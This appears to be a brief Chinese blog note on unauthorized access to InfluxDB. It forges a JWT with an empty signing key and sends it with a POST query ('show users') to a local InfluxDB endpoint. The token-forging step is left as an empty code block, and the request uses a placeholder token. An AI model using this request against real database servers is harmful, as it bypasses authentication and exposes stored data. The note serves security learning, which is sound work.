【笔记】InfluxDB未授权访问

发表于 更新于 阅读次数:

前言

InfluxDB利用JWT的空密钥加密,实现未授权访问
由于InfluxDB没有文件写入的权限,所以造成的影响只有查看数据库中的数据

伪造一个空密钥加密的JWT令牌

1

请求时携带JWT令牌

request
1
2
3
4
5
POST http://127.0.0.1:8088/query
Content-Type: application/x-www-form-urlencoded
Authorization: Basic <jwt>

db=sample&q=show users

完成

参考文献

哔哩哔哩——xiaodisec